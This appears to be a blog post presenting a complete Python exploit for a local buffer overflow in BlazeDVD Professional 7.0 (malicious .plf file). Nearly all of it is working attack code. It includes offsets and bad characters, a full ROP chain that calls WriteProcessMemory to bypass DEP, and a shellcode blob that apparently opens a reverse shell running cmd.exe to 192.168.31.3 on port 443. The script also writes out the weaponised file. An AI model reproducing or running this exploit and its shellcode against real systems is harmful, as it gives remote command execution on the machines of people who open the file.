DEP绕过WriteProcessMemory练习 - BlazeDVD Professional 7.0

0x0dee 2024-03-04 01:03:22

import sys, os, time
from struct import pack

def rop() :
    """Build the ROP chain as raw bytes.

    Returns the entries of ``ropbuf`` packed in list order as little-endian
    unsigned 32-bit values (``pack("<L", ...)``). The chain is pure data:
    the position and exact value of every entry, the 0xffffffff fillers
    included, are part of its meaning, so the list must not be reordered
    or trimmed.

    Raises:
        struct.error: if any entry falls outside 0..0xffffffff.
    """
    ###                                                                         ###

    #    Software: BlazeDVD Professional 7.0 (load *.plf) Local Buffer Overflow (DEP Bypass)
    #    Exploit author: 0x0dee
    #    Module used: MediaPlayerCtrl.dll
    #    Bad chars: 0x00 0x0a 0x1a
    #    API used for the DEP bypass: WriteProcessMemory (WPM)
    #    Address of WPM in the import table: 0x640542dc
    #    Code cave address: 0x64050dc0
    #    Writable address: 0x6406efd0

    ###                                                                         ###

    ropbuf =[
        0x6402c95f, # nop  ; ret  ;
        0xffffffff, # offset pad for esp
        0xffffffff,
        0xffffffff,
        0xffffffff,
        ## dereference WriteProcessMemory in import table
        0x640499a7, # pop eax ; ret  ;
        0x640542dc, ## WPM import table address
        0x64039d96, # mov eax, dword [eax] ; ret  ;
        0x64046c72, # xchg eax, edx ; ret  ;

        ## get call_struct address = esp + 0x204 (the value below is -0x204)
        ## WPM call address = dword [640542dc]
        0x64025874, # push esp ; pop esi ; ret  ;
        0x6404bf22, # mov eax, esi ; pop esi ; ret  ;
        0xffffffff, ## pop to esi
        0x640502d4, # pop ecx ; ret  ;
        0xfffffdfc, ## 0 - 0x204 as unsigned 32-bit
        0x6403ed14, # sub eax, ecx ; ret  ;
        0x640506f4, # pop ecx ; ret  ;
        0x6406efd0, ## Writable address
        0x6404246c, # mov dword [eax], edx ; mov dword [ecx], eax ; retn 0x000C ;

        ## return address = 64050dc0
        0x64040233, # inc eax ; ret  ;
        0xffffffff, ## for retn 0x0C
        0xffffffff, ## for retn 0x0C
        0xffffffff, ## for retn 0x0C
        0x64040233, # inc eax ; ret  ;
        0x64040233, # inc eax ; ret  ;
        0x64040233, # inc eax ; ret  ;
        0x6405147a, # pop edx ; ret  ;
        0x64050dc0, ## code cave for shellcode
        0x640506f4, # pop ecx ; ret  ;
        0x6406efd0, ## Writable address
        0x6404246c, # mov dword [eax], edx ; mov dword [ecx], eax ; retn 0x000C ;

        # hProcess = -1
        0x64040233, # inc eax ; ret  ;
        0xffffffff, ## for retn 0x0C
        0xffffffff, ## for retn 0x0C
        0xffffffff, ## for retn 0x0C
        0x64040233, # inc eax ; ret  ;
        0x64040233, # inc eax ; ret  ;
        0x64040233, # inc eax ; ret  ;
        0x6405147a, # pop edx ; ret  ;
        0xffffffff, ## -1 for hProcess
        0x640506f4, # pop ecx ; ret  ;
        0x6406efd0, ## Writable address
        0x6404246c, # mov dword [eax], edx ; mov dword [ecx], eax ; retn 0x000C ;

        # lpBaseAddress = 0x64050dc0
        0x64040233, # inc eax ; ret  ;
        0xffffffff, ## for retn 0x0C
        0xffffffff, ## for retn 0x0C
        0xffffffff, ## for retn 0x0C
        0x64040233, # inc eax ; ret  ;
        0x64040233, # inc eax ; ret  ;
        0x64040233, # inc eax ; ret  ;
        0x6405147a, # pop edx ; ret  ;
        0x64050dc0, ## code cave
        0x640506f4, # pop ecx ; ret  ;
        0x6406efd0, ## Writable address
        0x6404246c, # mov dword [eax], edx ; mov dword [ecx], eax ; retn 0x000C ;


        # lpBuffer = offset of call_struct + 0x30
        0x64046c72, # xchg eax, edx ; ret  ;
        0xffffffff, ## for retn 0x0C
        0xffffffff, ## for retn 0x0C
        0xffffffff, ## for retn 0x0C
        0x6401a3ac, # mov eax, edx ; ret  ;
        0x640502d4, # pop ecx ; ret  ;
        0xffffffd0, ## -0x30
        0x6403ed14, # sub eax, ecx ; ret  ;
        0x64046c72, # xchg eax, edx ; ret  ;
        0x6401a3ac, # mov eax, edx ; ret  ;
        0x6404c6ff, # pop esi ; ret  ;
        0xffffffd4, ## -0x2c
        0x64041797, # add eax, esi ; pop esi ; ret  ;
        0xffffffff, ## for pop esi
        0x640506f4, # pop ecx ; ret  ;
        0x6406efd0, ## Writable address
        0x6404246c, # mov dword [eax], edx ; mov dword [ecx], eax ; retn 0x000C ;

        # nSize = 0x220
        0x64040233, # inc eax ; ret  ;
        0xffffffff, ## for retn 0x0C
        0xffffffff, ## for retn 0x0C
        0xffffffff, ## for retn 0x0C
        0x64040233, # inc eax ; ret  ;
        0x64040233, # inc eax ; ret  ;
        0x64040233, # inc eax ; ret  ;
        0x64046c72, # xchg eax, edx ; ret  ;
        0x64053bf1, # xor eax, eax ; ret  ;
        0x640502d4, # pop ecx ; ret  ;
        0xfffffde0, ## -0x220
        0x6403ed14, # sub eax, ecx ; ret  ;
        0x64046c72, # xchg eax, edx ; ret  ;
        0x640506f4, # pop ecx ; ret  ;
        0x6406efd0, ## Writable address
        0x6404246c, # mov dword [eax], edx ; mov dword [ecx], eax ; retn 0x000C ;

        # [OUT] *lpNumberOfBytesWritten = 0x6406efd0
        0x64040233, # inc eax ; ret  ;
        0xffffffff, ## for retn 0x0C
        0xffffffff, ## for retn 0x0C
        0xffffffff, ## for retn 0x0C
        0x64040233, # inc eax ; ret  ;
        0x64040233, # inc eax ; ret  ;
        0x64040233, # inc eax ; ret  ;
        0x6405147a, # pop edx ; ret  ;
        0x6406efd0, ## .data writable address
        0x640506f4, # pop ecx ; ret  ;
        0x6406efd0, ## Writable address
        0x6404246c, # mov dword [eax], edx ; mov dword [ecx], eax ; retn 0x000C ;

        # call WPM
        0x6403ea41, # sub eax, 0x20 ; pop ebx ; ret  ;
        0xffffffff, ## pop to ebx
        0xffffffff, ## for retn 0x0C
        0xffffffff, ## for retn 0x0C
        0xffffffff, ## for retn 0x0C
        0x64039f50, # add eax, 0x08 ; ret  ;
        0x64032313  # push eax ; pop esp ; ret  ;



       ## Unused alternative gadgets kept by the author (not part of the chain):
       # 0x6401a3ac, # mov eax, edx ; ret  ;
       # 0x6401ccc0, # mov eax, ecx ; ret  ;
       # 0x64048d30, # mov eax, ebx ; pop esi ; pop ebx ; ret  ;
       # 0x64010341, # add al, 0xFF ; push edx ; pop eax ; pop esi ; ret  ;
       # 0x64016676, # xchg eax, ebx ; ret  ;
    ]

    # Each entry becomes 4 bytes, little-endian, unsigned.
    return b''.join(pack("<L", _) for _ in ropbuf)

bufferSize = 0xe10  # total .plf size to emit (the author also noted 0xf58)

# Author's measurements: EIP offset 260 (0n260), ESP offset 280 (0n280).
# Bytes that must not appear in the payload: 0x00 0x0a 0x1a

offsetOfEIP = b"A" * 260  # filler covering the 260 bytes before EIP
ropbuf = rop()
# The ROP chain is placed directly after the EIP filler.
buffer = offsetOfEIP + ropbuf

# shellcode size: 0x151 (337)  -- per the author; not re-counted here
shellcode = b'\x89\xe5\x81\xc4\xf0\xf9\xff\xff\xeb\x06^\x89u\x04\xebN\xe8\xf5\xff\xff\xff`1\xc9d\x8bq0\x8bv\x0c\x8bv\x1cV\x8b^\x08\x0f\xb6F\x1e\x89E\xf8\x8bC<\x8b|\x03x\x01\xdf\x8bO\x18\x8bG \x01\xd8\x89E\xfc\xe3\x1dI\x8bE\xfc\x8b4\x88\x01\xde1\xc0\x8bU\xf8\xfc\xac\x84\xc0t\x0e\xc1\xca\x02\x01\xc2\xeb\xf4\xeb)^\x8b6\xeb\xbd;T$(u\xd6\x8bW$\x01\xdaf\x8b\x0cJ\x8bW\x1c\x01\xda\x8b\x04\x8a\x01\xd8\x89D$ ^aYZQ\xff\xe0\xb8\xb4\xb3\xff\xfe\xf7\xd8Ph32.DhWS2_Thhz\xc4v\xffU\x04\x89\xe01\xc9f\xb9\x90\x05)\xc8P1\xc0f\xb8\x02\x02Ph\x96 \x9e\xcc\xffU\x041\xc0PPP\xb0\x06P,\x05P@Phf ^\x81\xffU\x04\x89\xc61\xc0PPh\xc0\xa8\x1f\x03f\xb8\x01\xbb\xc1\xe0\x10f\x83\xc0\x02PT_1\xc0PPPP\x04\x10PWVh\x95 ^W\xffU\x04VVV1\xc0\x8dH\rP\xe2\xfd\xb0DPT_f\xc7G,\x01\x01\xb8\x9b\x87\x9a\xff\xf7\xd8Phcmd.\x89\xe3\x89\xe01\xc9f\xb9\x90\x03)\xc8PW1\xc0PPP@PHPPSPh\xc7(\xaa\x0b\xffU\x041\xc9Qj\xffh\xd2U\xa9.\xffU\x04'

# 0x90 sled sized so that ropbuf + sled always total 0x204 + 0x30 + 0x40
# bytes regardless of the chain length; 0x204 and 0x30 are the same
# constants used inside rop(). The extra 0x40 is not explained by the
# author -- TODO confirm.
offsetOfshellcode = b"\x90" * (0x204 + 0x30 - len(ropbuf) + 0x40)
buffer += offsetOfshellcode + shellcode

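print("[ ] rop size "+ hex(len(ropbuf)))

# Pad with 'Z' up to bufferSize so the file has a fixed total length.
# A negative padding means the payload already exceeds bufferSize;
# raising here keeps that from silently producing an oversized file.
padding = bufferSize - len(buffer)
if padding < 0:
    raise ValueError(
        "buffer is {} bytes, larger than bufferSize {:#x}".format(len(buffer), bufferSize)
    )
buffer += b"Z" * padding

# The context manager closes the handle even if write() raises.
with open("venom_file.plf", "wb") as plf:
    plf.write(buffer)
print("[+] Write buffer " + str(len(buffer)) + " bytes.")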
